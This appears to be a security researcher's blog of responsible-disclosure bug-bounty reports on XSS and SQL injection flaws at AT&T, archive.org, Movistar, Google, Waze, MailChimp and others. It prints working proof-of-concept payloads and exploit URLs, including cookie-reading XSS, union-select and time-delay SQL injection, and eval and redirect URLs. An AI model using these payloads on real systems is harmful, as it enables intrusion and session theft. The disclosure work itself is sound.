Francisco Correa Security.log

 Here.com, is a Nokia business unit that brings together Nokia's mapping and location assets under one brand. The technology of Here is based on a cloud-computing model, in which location data and services are stored on remote servers so that users have access to it regardless of which device they use.  HERE Map Creator is a service launched by Nokia in November 2012 to allow users to map their neighborhood. With this bug I could SAVE a Road name with a payload on the map. Any user that try on re-edit the street name will get this XSS. I report a similar bug to Waza.com a few months ago .  Nokia Reponse:   Thanks to Nokia for starting this bug bounty program .

I found a Flash XSS at AT&T main domain where an attacker could stealing credentials of users. Vuln URL: http://www.att.com/media/en_US/scripts/JSAM/JSAM_VideoPlayer.swf?completeHandler= JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}// &source=https://www.wireless.att.com/home/video_progressive/video_marquees/B2CNDA-24-emerald-hp-marquee-bkd.mp4 Payload: JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}// Flash Vuln Code: public function videoPlayer_completeHandler(_arg1:VideoEvent):void{ if (ExternalInterface.available){ ExternalInterface.call(completeHandler, ExternalInterface.objectID); } else { trace("JSAM_VideoPlayer cannot call completeHandler because ExternalInterface is not available."); }; } Proof: After 2 months AT&T Response: I hope to be on the top 10 Award :)

Movistar is a major Spanish mobile phone operator owned by Telefónica S.A. operating in Spain and in many Latin American countries. It is the largest carrier in Spain with 22 million customers (cellphone services only) I found this MSSQL Injection. By Adding ' WAITFOR DELAY '0:0:20'-- getting a positive response of 20-second delay. Proving this parameter SEOname is Vulnerable to SQL INJECTION. I Report this to Movistar and they reply and FIX quick :) Great job Movistar!

The Internet Archive allows the public to upload and download digital material to its data cluster, but the bulk of its data is collected automatically by its web crawlers, which work to preserve as much of the public web as possible. Its web archive, The Wayback Machine, contains over 150+ billion web captures.  Looking at archive.org I found a cool MySql Injection on the user panel. Using " and "1"="1"# instead of  ' and '1'='1'# I did this by updating my nickname to 1" and "1"="1" union select version(0)# geting the version of mysql successfully. Vulnerable URL: https://archive.org/account/?screenname=1"+and+"1"="1"+union+select+version(0)#&action=change-screenname&submit=Change I report this to archive.org and I never have a reply. After 4 months they fix it. Proof: A simple thank you would be nice.

This week I got two emails one from Apple and an other one from Ubuntu saying: -- Now all users have to change there passwords. Even I... Maybe in the future they will care more about their security.  This is why all companies should have a Bug Bounty Program

First of all I like to said this XSS it's stored on Google "sandbox" and it impossible to grap Cookies. But its possible to send it to an other user using "Google Art Project Add-ons" at https://plus.google.com/ hangouts/_/ .  Hangouts allows users to hold conversations between two or more users. The service can be accessed online through the Gmail or Google+ websites, or through mobile apps available for Android and iOS (which were distributed as a successor to their existing Google Talk apps). This Persistent XSS can be more significant than other types because an attacker's malicious script is rendered automatically when an modify art project it's share to the Victim using hangouts add-ons.   (like showing under) (This is an Interactive Chat and can be easy use by anyone)   I first modify the Art Protect I want to inject at   http://www.google.com/ culturalinstitute/project/art- project?hl=en   Then using Google Art Project Add-

  Finally! I find the bug a was looking for!! last week looking at sketchup.google.com I find a flash file vulnerable to xss at parameter eventHandler   with this was possible to get a positive XSS :) Google Response: This is my first big reward and Im happy as. I like to thanks to google for starting this program. Report: Fri, Jul 5, 2013 at 2:13 PM Fix: Tues, Jul 9, 2013 at 9:00 AM  

  Waze is currently using its second generation map editing interface. Known as the Waze Map Editor (or WME for short), it is the default editor for Waze since September 19, 2011. This editor interface is internally code-named "Papyrus", and was functionally upgraded on April 21, 2013.     When adding an alternate city and street name was possible to inject a nice XSS . If I save on the editor all users that click on the street get the XSS. Google Response: Next time I will wait 6 months :) Report: Wed, Jun 26, 2013 at 7:53 PM  Fix: Tue, Jul 02, 2013 at 9:00 PM

  Today looking at  googlegroups.com when uploading a file swf I could preview the file  on the server triggering bugs like XSS, Redirection, http request   XSS proof: https://anon4v.googlegroups. com/attach/ad95b6883d02ee92/ xss.swf?gda=-- h2a0cAAAAf1aJvtdZvL0V0Vur0XewT V1qzvAInIaFKdkrbn96pkZ1koWdz85 XW- WM6SHiL84IbQwFxJw55cVwemAxM- EWmeV4duv6pDMGhhhZdjQlNAw&c= alert(document.cookie)&a=eval& view=1&part=4 Redirection  proof: https://anon4v.googlegroups. com/attach/ad95b6883d02ee92/ xss.swf?gda=-- h2a0cAAAAf1aJvtdZvL0V0Vur0XewT V1qzvAInIaFKdkrbn96pkZ1koWdz85 XW- WM6SHiL84IbQwFxJw55cVwemAxM- EWmeV4duv6pDMGhhhZdjQlNAw&a= location&c=http://www.paypal. com/&view=1&part=4 http request to url  proof : https://anon4v.googlegroups. com/attach/ad95b6883d02ee92/ xss.swf?gda=-- h2a0cAAAAf1aJvtdZvL0V0Vur0XewT V1qzvAInIaFKdkrbn96pkZ1koWdz85 XW- WM6SHiL84IbQwFxJw55cVwemAxM- EWmeV4duv6pDMGhhhZdjQlNAw&a= get&c=http://www.webcrea.cl/& view

Nice I'm on the Wall of Fame of SproutSocial.com http://sproutsocial.com/responsible-disclosure-policy

 Nice I got reward from Bugcrowd for Beta015 and Beta016! Thanks  Bugcrowd

Google Webchat | Cross Site Scripting Vulnerability I find out that fiber.google.com was using a third party app at fiber-chat.com: 8443/googlechat/   similar to  FastPath Webchat that has multiple XSS Turned out that the email parameter was  vulnerable  to XSS test@gmail.com"><svg/onload=alert(1)> When Login off the chat I got a positive XSS response. I Report this to Google Security Team and the response was this: Report: Tue, Jun 18, 2013 1:34PM  Fix: Wed, Jun 19, 2013 9:00AM No Reward for this Bug

XSS at us7.admin.mailchimp.com and help.mailchimp.com I found XSS at us7.admin.mailchimp.com   And an other Flash XSS at help.mailchimp.com Report:Mon, Jun 17, 2013 at 12:46 AM Fix:Tue, Jun 18, 2013 at 9:00 AM